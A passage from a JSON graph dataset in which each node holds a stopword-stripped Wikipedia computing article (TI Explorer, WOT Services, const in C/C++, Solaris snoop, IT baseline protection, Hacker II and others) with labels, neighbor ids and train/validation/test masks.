      576,
      8772,
      8266,
      1109,
      10333,
      97,
      4708,
      8298,
      9836,
      7789,
      7285,
      9333,
      6263,
      2168,
      9335,
      1147,
      3197,
      1150,
      9343,
      2179,
      10883,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      9366,
      2199,
      6296,
      11419,
      7325,
      9887,
      6309,
      1190,
      5286,
      10405,
      5293,
      3248,
      7344,
      6837,
      2230,
      5816,
      1212,
      8380,
      3265,
      8388,
      10951,
      9420,
      9932,
      5840,
      7378,
      3795,
      4819,
      8402,
      7382,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      1253,
      8938,
      1263,
      3312,
      3826,
      2291,
      5363,
      246,
      3834,
      2811,
      3328,
      10499,
      11012,
      2314,
      1804,
      8461,
      6416,
      273,
      1810,
      11539,
      6935,
      11033,
      287,
      10016,
      1825,
      6434,
      5413,
      10235,
      3368,
      2345,
      4907,
      9004,
      302,
      7983,
      11568,
      6961,
      6963,
      1844,
      823,
      4409,
      6970,
      7483,
      11072,
      11075,
      3909,
      4423,
      2378,
      4431,
      5457,
      5969,
      11601,
      346,
      2395,
      2397,
      10590,
      10596,
      2407,
      8551,
      10087,
      5492,
      11638,
      6519,
      11128,
      890,
      7554,
      394,
      3978,
      8075,
      7565,
      6545,
      7057,
      11667,
      5013,
      11675,
      8092,
      11676,
      414,
      2974,
      7070,
      421,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      6075,
      6078,
      9151,
      8643,
      8136,
      7126,
      2015,
      1509,
      9189,
      7663,
      6128,
      5619,
      11256,
      2555,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 377,
    "label": 9,
    "text": "TI_Explorer:ti explorer texas instruments explorer family lisp machine computers computers sold texas instruments 1980s explorer based design lisp machines incorporated based mit lisp machine explorer used development deployment artificial-intelligence software notable also early use nubus system bus explorer computer family explorer used development deployment artificial-intelligence software later models based special 32-bit microprocessor developed texas instruments supported execution lisp software hardware operating system explorer written lisp machine lisp also supported common lisp notable application spike scheduling system hubble space telescope spike developed texas instruments explorer workstations",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      5829,
      4550,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      9686,
      10712,
      3034,
      3675,
      989,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 378,
    "label": 4,
    "text": "WOT_Services:wot services mywot/wot web trust browser add-on web site wot online reputation internet safety service providing crowdsourced reviews data whether websites respect user privacy secure indicators trust november 2016 german state media investigation found wot secretly collected personal user details sold licensed information unidentified third-party businesses entities data monetization purposes activity breached privacy rules guidelines set several browsers result browser add-on involuntarily removed mozilla firefox add-on store voluntarily removed browsers add-on/extension stores wot eventually reinstated wot services founded 2006 sami tolvanen timo ala-kleemola wrote wot software post-graduates tampere university technology finland launched service officially 2007 esa suurio ceo suurio replaced november 2009 founders left company 2014 2009 mysql founder michael widenius invested wot became member board directors wot services longer portfolio company widenius venture capital firm openocean.vc february 2016 wot services changed name tow software wot services partnerships mail.ru facebook hphosts legitscript panda security phishtank globalsign truste november 2013 wot 100 million downloads wot made money collecting browsing history data users selling usage data said anonymized data selling november 1 2016 german public broadcasting station ndr reported results investigation in-house journalists showing wot collected recorded analyzed sold user-related data third parties data obtained traceable wot could assigned specific individuals despite wot claim user data anonymized ndr investigative journalism report based freely available sample data revealed sensitive private information 50 users could retrieved information included websites visited account names email addresses potentially revealing user illnesses sexual preferences drug consumption journalists also reconstructed media company confidential revenue data details ongoing police investigation german media contacted wot results investigation prior publication report wot declined comment findings days news story aired mozilla removed browser add-on firefox add-on store wot subsequently removed browsing tool browsers including chrome opera wot mobile security protection mobile app removed google play approximately one week extension removed google chrome extension store blog post published december 19 2016 wot services stated upgraded browser extension released google chrome extension gallery upgraded version included several major code updates order protect users privacy opt-out option user settings users wish share data us still want easy access wot february 2017 mozilla reinstated wot browsing tool firefox add-on store wot offers add-on web browsers including firefox google chrome opera internet explorer baidu extension rates websites based trustworthiness provides user red yellow green indicator red meaning site poor reputation wot discovered selling personally identifiable user data november 2016 breach user privacy initially discovered reported investigative journalists germany widely reported press resulting removal web trust plugin major browsers years prior discovery privacy breach press reviews positive new york times washington post wrote wot -- nyt 2010 post 2008 2011 pc world preston gralla rick broida recommended wot 2009 2010 respectively pc magazine neil rubenking concluded web trust protection free n't impact browsing speed well worth trying however minus side found several clearly adult sites unrated wished wot would also rate sponsored search results like major competitors 2013 softpedia reviewer ionut ilascu wrote reliability service grown past years despite voices accusing exactly opposite proof collaboration facebook opera mail.ru group concluding service wot web trust may viewed biased latest developments balancing user opinion order provide relevant information point contrary february 2011 lawsuit florida united states filed wot forum members demanding wot remove certain website ratings associated comments cautioning phishing scams court ordered case dismissed prejudice equivalent verdict guilty us law germany preliminary injunctions issued courts delete feedback",
    "neighbors": [
      8584,
      202,
      5078,
      503,
      8413
    ],
    "mask": "Test"
  },
  {
    "node_id": 379,
    "label": 2,
    "text": "GNUstepWeb:gnustepweb gnustepweb development environment application server web applications characterized strict separation data storage processing user interface development gnustepweb based gnustep goals compatible webobjects version 4.5.x extensions apple webobjects ported java version 5 gnustepweb continues using objective-c",
    "neighbors": [
      10470,
      5612,
      5677,
      7983,
      8304,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 380,
    "label": 9,
    "text": "Const_(computer_programming):const computer programming c c++ javascript programming languages const type qualifier keyword applied data type indicates data read used declare constants codice_1 c family languages differs similar constructs languages part type thus complicated behavior combined pointers references composite data types type-checking applied object declaration indicates object constant value may changed unlike variable basic use – declare constants – parallels many languages however unlike languages c family languages codice_1 part type part object example c codice_3 declares object codice_4 codice_5 type – codice_1 part type parsed “ const int x ” – ada codice_7 declares constant kind object codice_8 codice_9 type codice_10 part object part type two subtle results firstly codice_1 applied parts complex type – example codice_12 declares constant pointer constant integer codice_13 declares variable pointer constant integer codice_14 declares constant pointer variable integer secondly codice_1 part type must match part type-checking example following code invalid void f int x const int f argument codice_16 must variable integer codice_17 constant integer matching form program correctness known const-correctness allows form programming contract functions specify part type signature whether modify arguments whether return value modifiable type-checking primarily interest pointers references – basic value types like integers – also composite data types templated types containers concealed fact codice_1 often omitted due type coercion implicit type conversion c call-by-value c++ either call-by-value call-by-reference idea const-ness imply variable stored computer memory unwritable rather codice_1-ness compile-time construct indicates programmer necessarily note however case predefined data codice_20 string literals c codice_1 often unwritable constant change value program running object declared codice_1 may indeed change value program running common example read registers within embedded systems like current state digital input data registers digital inputs often declared codice_1 codice_24 content registers may change without program anything codice_24 shall write either codice_1 addition non-static member-function declared codice_1 case codice_28 pointer inside function type codice_29 rather merely type codice_30 means non-const functions object called inside function member variables modified c++ member variable declared codice_31 indicating restriction apply cases useful example caching reference counting data synchronization cases logical meaning state object unchanged object physically constant since bitwise representation may change c c++ data types including defined user declared codice_1 const-correctness dictates variables objects declared unless need modified proactive use codice_1 makes values easier understand track reason thus increases readability comprehensibility code makes working teams maintaining code simpler communicates information value intended use help compiler well developer reasoning code also enable optimizing compiler generate efficient code simple non-pointer data types applying codice_1 qualifier straightforward go either side type historical reasons codice_35 equivalent codice_36 implementations using codice_1 sides type instance codice_38 generates warning error pointer reference types meaning codice_1 complicated – either pointer value pointed codice_1 syntax confusing pointer declared codice_1 pointer writable value writable pointer codice_1 value codice_1 pointer codice_1 value codice_1 pointer reassigned point different object one initially assigned used modify value points called pointee reference variables thus alternate syntax codice_1 pointers pointer codice_1 object hand reassigned point another memory location object type convertible type used modify memory pointing codice_1 pointer codice_1 object also declared neither used modify pointee reassigned point another object following code illustrates subtleties void foo int ptr following usual c convention declarations declaration follows use codice_50 pointer written pointer indicating dereferencing example declaration codice_51 dereferenced form codice_52 codice_53 reference form codice_54 pointer codice_53 thus codice_1 modifies name right c++ convention instead associate codice_50 type codice_58 read codice_1 modifying type left codice_60 thus read codice_61 codice_62 value constant codice_63 codice_64 pointer pointer constant integer thus int *ptr // *ptr int value int const *ptrtoconst // *ptrtoconst constant int integer value int const constptr // constptr constant int integer pointer int const const constptrtoconst // constptrtoconst constant pointer following c++ convention analyzing type value rule thumb read declaration right left thus everything left star identified pointee type everything right star pointer properties instance example codice_64 read writable pointer refers non-writable integer codice_66 read non-writable pointer refers writable integer generic rule helps understand complex declarations definitions works like example reading left important read elements right left codice_64 becomes pointer const int const pointer int cases c/c++ allows codice_1 keyword placed left type examples const int *ptrtoconst //identical int const *ptrtoconst const int *const constptrtoconst //identical int const *const constptrtoconst although c/c++ allows definitions closely match english language reading definitions left right compiler still reads definitions according abovementioned procedure right left putting codice_1 must constant quickly introduces mismatches intend write compiler decides wrote consider pointers pointers int **ptr // pointer pointer ints int const **ptr // pointer pointer constant int value int *const *ptr // pointer const pointer int values int **const ptr // constant pointer pointers ints int const **const ptr // constant pointer pointers constant int values final note regarding pointer definitions always write pointer symbol much possible right attaching pointer symbol type tricky strongly suggests pointer type n't case examples int* /* write */ int *a // pointer int int* b // confusing int* *b // ugly b pointers ints bjarne stroustrup faq recommends declaring one variable per line using c++ convention avoid issue considerations apply defining references c++ rvalue references int var 22 int const reftoconst var // ok int const ref2 var ref3 var // confusing int const constref var // error references ca n't change anyway // c++ int rref int 5 value 10 // confusing complicated declarations encountered using multidimensional arrays references pointers pointers although sometimes argued declarations confusing error-prone therefore avoided replaced higher-level structures noted procedure described top section always used without introducing ambiguities confusion codice_1 declared function parameters variables static automatic including global local interpretation varies uses codice_1 static variable global variable static local variable constant may used data like mathematical constants codice_72 – realistically longer overall compile-time parameters codice_1 automatic variable non-static local variable means single assignment happening though different value may used time codice_74 codice_1 parameter pass-by-reference means referenced value modified – part contract – codice_1 parameter pass-by-value pointer pass-by-reference add anything interface value copied indicates internally function modify parameter single assignment reason favor using codice_1 parameters pass-by-reference changes contract pass-by-value exposes implementation order take advantage design contract approach user-defined types structs classes methods well member data programmer may tag instance methods codice_1 n't modify object data members applying codice_1 qualifier instance methods thus essential feature const-correctness available many object-oriented languages java c microsoft c++/cli managed extensions c++ codice_1 methods called codice_1 non-codice_1 objects alike non-codice_1 methods invoked non-codice_1 objects const modifier instance method applies object pointed codice_28 pointer implicit argument passed instance methods thus const methods way apply const-correctness implicit codice_28 pointer argument like arguments example illustrates class c public void foo c nonconstc const c constc code implicit codice_28 pointer codice_88 type codice_89 whereas codice_28 pointer codice_91 type codice_92 indicating method modify object codice_28 pointer often programmer supply codice_1 non-codice_1 method name possibly quite different uses class accommodate types callers consider class myarray public void foo myarray array myarray const constarray codice_1-ness calling object determines version codice_97 invoked thus whether caller given reference manipulate observe private data object two methods technically different signatures codice_28 pointers different types allowing compiler choose right one returning codice_1 reference codice_53 instead merely returning codice_53 value may overkill second method technique used arbitrary types standard template library several loopholes pure const-correctness c c++ exist primarily compatibility existing code first applies c++ use codice_102 allows programmer strip codice_1 qualifier making object modifiable necessity stripping qualifier arises using existing code libraries modified const-correct instance consider code // prototype function change // know modify pointee passed void libraryfunc int* ptr int size void calllibraryfunc const int* ptr int size however attempt modify object declared codice_1 means codice_105 results undefined behavior according iso c++ standard example codice_54 references global local member variable declared codice_1 object allocated heap via codice_108 code correct codice_109 really modify value pointed codice_54 c language need loophole certain situation exists variables static storage duration allowed defined initial value however initializer use constants like string constants literals allowed use non-constant elements like variable names whether initializer elements declared codice_1 whether static duration variable declared codice_1 non-portable way initialize codice_1 variable static storage duration carefully constructing typecast left hand side later assignment codice_1 variable written effectively stripping away codice_1 attribute 'initializing non-constant elements like codice_1 variables writing codice_1 variable way may work intended causes undefined behavior seriously contradicts const-correctness const size_t buffersize 8*1024 const size_t usertextbuffersize //initial value depends const buffersize ca n't initialized int setupusertextbox textbox_t *defaulttextboxtype rect_t *defaulttextboxlocation another loophole applies c c++ specifically languages dictate member pointers references shallow respect codice_1-ness owners — containing object codice_1 codice_1 members except member pointees referees still mutable illustrate consider c++ code struct void foo const although object codice_121 passed codice_122 constant makes members constant pointee accessible codice_123 still modifiable though may desirable standpoint codice_1-correctness codice_121 might solely pointee reason meyers argues default member pointers references deep codice_1-ness could overridden codice_31 qualifier pointee owned container strategy would create compatibility issues existing code thus historical reasons loophole remains open c c++ latter loophole closed using class hide pointer behind codice_1-correct interface classes either support usual copy semantics codice_1 object implying containing class copied usual semantics either allow loopholes permitting stripping codice_1-ness inadvertent intentional copying finally several functions c standard library violate const-correctness accept codice_1 pointer character string return non-codice_1 pointer part string codice_133 codice_134 among functions implementations c++ standard library microsoft try close loophole providing two overloaded versions functions codice_1 version non-codice_1 version use type system express constancy leads various complexities problems accordingly criticized adopted outside narrow c family c c++ d. java c heavily influenced c c++ explicitly rejected codice_1-style type qualifiers instead expressing constancy keywords apply identifier codice_138 java codice_1 codice_140 c even within c c++ use codice_1 varies significantly projects organizations using consistently others avoiding codice_1 type qualifier causes difficulties logic function agnostic whether input constant returns value qualified type input words functions input constant const-qualified return value well input variable const-qualified return value well type signature functions differs requires two functions potentially case multiple inputs logic – form generic programming problem arises even simple functions c standard library notably codice_134 observation credited ritchie tom plum mid 1980s codice_134 function locates character string formally returns pointer first occurrence character codice_146 string codice_121 classic c k r c prototype char *strchr char *s int c codice_134 function modify input string return value often used caller modify string p strchr q '/ thus one hand input string const since modified function input string const return value well – simply might return exactly input pointer first character match – hand return value const original string const since caller may wish use pointer modify original string c++ done via function overloading typically implemented via template resulting two functions return value const-qualified type input char* strchr char* int c const char* strchr const char* int c turn defined template template handled via codice_149 keyword acts wildcard const immutable unqualified variable yielding inout char strchr inout char int c however c neither possible since c function overloading instead handled single function input constant output writable char *strchr const char *s int c allows idiomatic c code strip const qualifier input actually const-qualified violating type safety solution proposed ritchie subsequently adopted difference one failures compatibility c c++ version 2 programming language two keywords relating const exist codice_150 keyword denotes data modified reference codice_1 keyword denotes non-mutable view mutable data unlike c++ codice_1 codice_1 codice_150 deep transitive anything reachable codice_1 codice_150 object codice_1 codice_150 respectively example const vs. immutable int foo new int 5 // foo mutable const int bar foo // bar const view mutable data immutable int baz foo // error views immutable data must immutable immutable int nums new immutable int 5 // mutable reference nums may created const int constnums nums // works immutable implicitly convertible const int mutablenums nums // error create mutable view immutable data example transitive deep const class foo immutable foo foo new immutable foo foo.next.num 5 // wo n't compile foo.next type immutable foo codice_1 introduced bjarne stroustrup c classes predecessor c++ 1981 originally called codice_140 motivation stroustrup writes first use scoped typed alternative macros analogously fulfilled function-like macros via codice_161 keyword constant pointers codice_162 notation suggested dennis ritchie adopted codice_1 adopted c part standardization appears c89 subsequent versions along type qualifier codice_24 qualifier codice_165 suggested december 1987 meeting x3j11 committee rejected goal ultimately fulfilled codice_166 keyword c99 ritchie supportive additions arguing carry weight ultimately argue removal standard subsequently inherited codice_1 c++ known type constructor type qualifier added two type constructors codice_150 codice_149 handle related use cases languages follow c/c++ constancy part type though often superficially similar constructs may use codice_1 keyword typically used constants constant objects c codice_1 keyword radically different simpler semantics means compile-time constant part type nim codice_1 keyword similar c also declares compile-time constant rather forming part type however nim constant declared expression evaluated compile time c c built-in types declared codice_1 user-defined types including classes structs arrays codice_1 java codice_1 – instead codice_138 applied local variable declarations applies identifier type different object-oriented use object members origin name java language specification regards codice_1 reserved keyword – i.e. one used variable identifier – assigns semantics reserved word used identifiers keyword special meaning thought reservation keyword occurred allow extension java language include c++-style codice_1 methods pointer codice_1 type enhancement request ticket implementing codice_1 correctness exists java community process closed 2005 basis impossible implement backwards-compatible fashion contemporary ada 83 independently notion constant object codice_10 keyword input parameters loop parameters implicitly constant codice_10 property object type javascript codice_1 declaration defines block-scoped variable reassigned redeclared defines read-only reference variable redefinded situations value variable may potentially change variable refers object property altered",
    "neighbors": [
      3462,
      655,
      6160,
      9490,
      1952,
      10145,
      2339,
      428,
      5165,
      5677,
      3767,
      10043,
      2620,
      10555,
      10684,
      1343,
      9794,
      8262,
      9425,
      1236,
      6102,
      7894,
      4960,
      6640,
      7409,
      10739,
      3577,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 381,
    "label": 4,
    "text": "Snoop_(software):snoop software snoop software command line packet analyzer included solaris operating system created sun microsystems source code available opensolaris project",
    "neighbors": [
      8077,
      2967,
      5280,
      6049,
      6177,
      1064,
      6445,
      7983,
      9665,
      842,
      9939,
      6997,
      5335,
      9440,
      11363,
      366,
      11506,
      5492,
      5240,
      4858,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 382,
    "label": 7,
    "text": "Cloud-to-cloud_integration:cloud-to-cloud integration cloud-to-cloud integration c2i allows users connect disparate cloud computing platforms paas platform service saas software service continue gain momentum different vendors different implementations cloud computing e.g database rest soap api another name cloud-to-cloud integration cloud-surfing see also cloud-based integration",
    "neighbors": [
      530,
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 383,
    "label": 4,
    "text": "IT_baseline_protection:baseline protection baseline protection german it-grundschutz approach german federal office information security fsi methodology identify implement computer security measures organization aim achievement adequate appropriate level security systems reach goal fsi recommends well-proven technical organizational personnel infrastructural safeguards organizations federal agencies show systematic approach secure systems e.g information security management system obtaining iso/iec 27001 certificate basis it-grundschutz term baseline security signifies standard security measures typical systems used various contexts somewhat different meanings example foundation baseline protection concept initially detailed risk analysis proceeds overall hazards consequently sophisticated classification according damage extent probability occurrence ignored three protection needs categories established help protection needs object investigation determined based appropriate personnel technical organizational infrastructural security measures selected baseline protection catalogs federal office security information technology baseline protection catalogs offer cookbook recipe normal level protection besides probability occurrence potential damage extents implementation costs also considered using baseline protection catalogs costly security analyses requiring expert knowledge dispensed since overall hazards worked beginning possible relative layman identify measures taken implement cooperation professionals fsi grants baseline protection certificate confirmation successful implementation baseline protection stages 1 2 based self declaration stage 3 independent fsi-licensed auditor completes audit certification process internationalization possible since 2006 iso/iec 27001 certification occur simultaneously baseline protection certification iso/iec 27001 standard successor bs 7799-2 process based new fsi security standards process carries development price prevailed time corporations certified bs 7799-2 standard obliged carry risk assessment make comfortable deviate protection needs analysis pursuant baseline protection catalogs advantage conformity strict fsi also attainment bs 7799-2 certification beyond fsi offers help aids like policy template gstool one data protection component available produced cooperation german federal commissioner data protection freedom information state data protection authorities integrated baseline protection catalog component considered however certification process following steps taken pursuant baseline protection process structure analysis protection needs analysis creation occurs following steps network includes totality infrastructural organizational personnel technical components serving fulfillment task particular information processing application area network thereby encompass entire character institution individual division partitioned organizational structures example departmental network shared applications example personnel information system necessary analyze document information technological structure question generate security concept especially apply baseline protection catalogs due today usually heavily networked systems network topology plan offers starting point analysis following aspects must taken consideration purpose protection needs determination investigate protection sufficient appropriate information information technology use connection damage application processed information could result breach confidentiality integrity availability considered important context realistic assessment possible follow-on damages division three protection needs categories low medium high high proved value public internal secret often used confidentiality heavily networked systems typically characterize information technology government business days rule therefore advantageous consider entire system individual systems within scope security analysis concept able manage task makes sense logically partition entire system parts separately consider part even network detailed documentation structure prerequisite use baseline protection catalogs network achieved example via structure analysis described baseline protection catalogs components must ultimately mapped onto components network question modelling step baseline security check organisational instrument offering quick overview prevailing security level help interviews status quo existing network modelled baseline protection relative number security measures implemented baseline protection catalogs investigated result catalog implementation status dispensable yes partly entered relevant measure identifying yet partially implemented measures improvement options security information technology question highlighted baseline security check gives information measures still missing nominal vs. actual comparison follows remains done achieve baseline protection security measures suggested baseline check need implemented peculiarities taken account could several less unimportant applications running server lesser protection needs totality however applications provided higher level protection called cumulation effect applications running server determine need protection connection noted several applications run system occurs application greatest need protection determines systems protection category conversely conceivable application great protection needs automatically transfer system may happen system configured redundantly inconsequential part running called distribution effect case example clusters baseline security check maps baseline protection measures level suffices low medium protection needs comprises 80 systems according fsi estimates systems high high protection needs risk analysis-based information security concepts like example iso/iec 27000-series standards usually used 2005 restructuring expansion baseline protection catalogs fsi separated methodology baseline protection catalog bsi 100-1 bsi 100-2 bsi 100-3 standards contain information construction information security management system isms methodology basic protection approach creation security analysis elevated elevated protection needs building completed baseline protection investigation bsi 100-4 emergency management standard currently preparation contains elements bs 25999 itil service continuity management combined relevant baseline protection catalog components essential aspects appropriate business continuity management bcm implementing standards renders certification possible pursuant bs 25999-2 fsi submitted fsi 100-4 standards design online commentary fsi brings standards line international norms like iso/iec 27001 way",
    "neighbors": [
      9184,
      10600,
      5353,
      5673,
      3181,
      3447,
      7898,
      5373,
      383
    ],
    "mask": "Test"
  },
  {
    "node_id": 384,
    "label": 0,
    "text": "Gale–Church_alignment_algorithm:gale–church alignment algorithm computational linguistics gale–church algorithm method aligning corresponding sentences parallel corpus works principle equivalent sentences roughly correspond length—that longer sentences one language correspond longer sentences language algorithm described 1993 paper william a. gale kenneth w. church bell laboratories",
    "neighbors": [
      9552,
      1890
    ],
    "mask": "Test"
  },
  {
    "node_id": 385,
    "label": 1,
    "text": "Database_right:database right database right sui generis property right comparable distinct copyright exists recognise investment made compiling database even involve creative aspect reflected copyright rights often referred plural database rights trips agreement requires copyright protection extends databases compilations constitute intellectual creation virtue selection arrangement contents even contents constitute materials protected copyright many countries act accordance requirement databases protected copyright condition met separate intellectual property right protecting databases aspects meet condition copyright protection database right extends protection databases depend condition required copyright protection recognised small number jurisdictions notably european union european union law database rights specifically coded i.e sui generis laws copying dissemination information computer databases rights first introduced 1996 11 march 1996 council european union passed directive 96/9/ec 11 march 1996 legal protection databases giving specific separate legal rights limitations certain computer records law calls database rights rights afforded manual records eu database rights laws similar format identical afforded artistic works database rights last 15 years time database substantially modified however new set rights created database owner right object copying substantial parts database even data extracted reconstructed piecemeal database rights eu created automatically vested employers creators action creation part employment registered effect database rights independent copyright arrangement selection presentation data may protected copyright database whole protected database right 1 january 1998 copyright rights databases regulations 1997 came force act makes number amendments copyright designs patents act 1988 extending copyright databases defined 1997 act addition contains new legislation creates database right regulations 13 14 regulations database rights automatically subsist substantial investment obtaining verifying presenting contents database rights remain force regulation 17 2 end 15th calendar year date database first made available public period database right infringed person without consent extracts re-uses substantial part contents database whether repeated extractions insubstantial parts hand lawful user database right regulation 19 1 extract re-use insubstantial parts data purpose right restricted database owner regulation 19 2 term substantial defined mean substantial terms quantity quality combination article 1260 civil code russia database collection independent materials presented objective form articles accounts legal texts judicial decisions similar materials systematically arranged way materials found processed computer database need registered enjoy legal protection civil code russia provides registration rights useful claims disputed court specific law exists australia protecting databases databases may protected fall general copyright law australian copyright law regarding compilations currently examined case law initial case telstra v desktop marketing systems successfully litigated telstra establishing database right however overturned later ruling icetv v nine network sufficient creativity established defining characteristic copyright although federal law 9610 1998 law authorial rights confers database owners exclusive rights specifically copying distribution translation databases also states right contingent upon database result intellectual creation therefore offering database rights uncreative collections facts outside congressional authority copyright clause article § 8 cl 8 united states constitution therefore database right exists united states originality sine qua non copyright united states see feist publications v. rural telephone service stopped database owners lobbying introduction right far bills introduce us prevented successful lobbying research libraries consumer groups firms benefit free use factual information",
    "neighbors": [
      3888,
      4301,
      10136,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 386,
    "label": 9,
    "text": "Variable_shadowing:variable shadowing computer programming variable shadowing occurs variable declared within certain scope decision block method inner class name variable declared outer scope level identifiers names rather variables known name masking outer variable said shadowed inner variable inner identifier said mask outer identifier lead confusion may unclear variable subsequent uses shadowed variable name refer depends name resolution rules language one first languages introduce variable shadowing algol first introduced blocks establish scopes also permitted many derivative programming languages including c c++ java c language breaks tradition allowing variable shadowing inner outer class method containing class if-block containing method case statements switch block languages allow variable shadowing cases others example kotlin allow inner variable function shadow passed argument variable inner block shadow another outer block java allow languages allow passed argument function/method shadow class field languages disallow variable shadowing completely coffeescript following lua code provides example variable shadowing multiple blocks following python code provides another example variable shadowing variable declaration variable assignment python keyword codice_1 introduced python 3 shall used avoid variable shadowing assign non-local variables keyword codice_2 shall used avoid variable shadowing assign global variables ecmascript 6 introduction let const block scoping allow variable shadowing",
    "neighbors": [
      512,
      1152,
      4777,
      8554,
      5677,
      10510,
      8221,
      10581,
      11574,
      10011,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 387,
    "label": 3,
    "text": "Future_Knight:future knight future knight video game released gremlin graphics 1986 several home computer systems space cruiser s.s. rustbucket crashed planet 2749 zragg system passengers taken hostage spegbott terrible minions among princess amelia beloved future knight randolph teleported wreck rustbucket defeat spegbott rescue future knight 2d flip screen platform game player must guide randolph twenty levels hostile robots aliens defeating spegbott rescuing amelia undocumented level editor included spectrum version accessed main menu pressing key combination edit-f-k game reviewed 1990 dragon 158 hartley patricia kirk lesser role computers column part mastertronic mega pack 10 games previously released europe reviewers gave game 1 5 stars stating ’ inside spaceship trying find princess distress really dumb game",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 388,
    "label": 5,
    "text": "Multiple_Access_with_Collision_Avoidance:multiple access collision avoidance multiple access collision avoidance maca slotted media access control protocol used wireless lan data transmission avoid collisions caused hidden station problem simplify exposed station problem basic idea maca wireless network node makes announcement sends data frame inform nodes keep silent node wants transmit sends signal called request-to-send rts length data frame send receiver allows transmission replies sender signal called clear-to-send cts length frame receive meanwhile node hears rts remain silent avoid conflict cts node hears cts keep silent data transmission complete wlan data transmission collisions may still occur maca wireless macaw introduced extend function maca requires nodes sending acknowledgements successful frame transmission well additional function carrier sense",
    "neighbors": [
      10112,
      2306,
      8708,
      3847,
      11288,
      2458,
      5020,
      1192,
      11560,
      7723,
      11181,
      7490,
      9284,
      5321,
      7498,
      2911,
      2785,
      5092,
      5863,
      2802
    ],
    "mask": "None"
  },
  {
    "node_id": 389,
    "label": 3,
    "text": "INT_10H:int 10h int 10h int 10h int 16 shorthand bios interrupt call 10 17th interrupt vector x86-based computer system bios typically sets real mode interrupt handler vector provides video services services include setting video mode character string output graphics primitives reading writing pixels graphics mode use call load ah number desired subfunction load required parameters registers make call int 10h fairly slow many programs bypass bios routine access display hardware directly setting video mode done infrequently accomplished using bios drawing graphics screen game needs done quickly direct access video ram appropriate making bios call every pixel furthermore modern x86 system bios calls performed real mode virtual 8086 mode v8086 option long mode means modern operating system operates protected mode 32 bit long mode 64 bit would need switch real mode back call bios hugely expensive operation although modern systems typically use device drivers directly set video mode feasible hobbyist systems device driver every video card problem also plagues older unsupported systems windows 98 systems instead drop real mode switch video mode draw framebuffer directly",
    "neighbors": [
      5312,
      255,
      6118,
      6730,
      1515,
      7501,
      8301,
      5823,
      11634,
      499,
      5080,
      4441,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 390,
    "label": 2,
    "text": "UserLinux:userlinux userlinux project create operating system based debian targeted business customers goal provide businesses freely available high quality operating system accompanied certifications service support options project initiated bruce perens late 2003 subsequent 2005 major success ubuntu commercial linux distribution based debian canonical ltd. much aims userlinux project lost steam software shipped project ultimately abandoned",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      4123,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 391,
    "label": 3,
    "text": "Hacker_II:_The_Doomsday_Papers:hacker ii doomsday papers hacker ii doomsday papers computer game written steve cartwright published activision 1986 sequel 1985 game hacker hacker ii released amiga apple ii apple iigs amstrad cpc atari st commodore 64 ibm pc macintosh zx spectrum hacker ii difficult involved first game hacker ii player actually recruited based upon assumed success activities original game tasked controlling robot time infiltrate secure facility order retrieve documents known doomsday papers well guarded vault ensure security united states eventually escape papers player confronted agents united states reveal actually working former magma employee wanted papers revenge happened company player presumably exposed first game building player unwittingly broken government facility player go back facility part gambit expose magma agent avoiding security threatened player gameplay considerably changed previous game packaging notable including manual describing function four way monitor system provided player hooked camera security network facility player asked infiltrate handful robots available hidden facility case lost using camera system in-game map helps track guard patrols location robots player must explore one floor facility find codes needed open vault escape papers aid player also pre-recorded security tape typical day every camera facility player bypass actual camera feed need area extended time although care needed ensure time stamp matches actual time game discovery guards must avoided costs alerted call huge machine resembles large plate hung looks like metal frame wheels machine pursues player defenseless robot attempt crush plate player try avoid drone although relentless pursuit much faster player robot player robots destroyed game things set alarms include seen patrolling guard constant line sight corridors one cameras see robot incorrectly disabling vault security failing sync bypassed camera feed actual time giving evidence tampering going game also featured escalating problems part player interface begins fail ingame map starts lose progress player robot monitored security cameras guard eventually map player defeated system eventually get vault player may well forced control robot blindly relying maps made player saves available game first title compute described hacker ii original plot criticized inability save favorably reported game graphics detail user interface magazine stated exciting harrowing scenarios 'll find computer game advised recommend anyone weak heart computer gaming world praised hacker ii graphics design atari st stated game accurately depicted system cracking hacker cautioned difficulty scale would appeal everyone info gave commodore 64 version four stars five describing superior sequel original ... engrossing challenging espionage game",
    "neighbors": [
      4579
    ],
    "mask": "None"
  },
  {
    "node_id": 392,
    "label": 3,
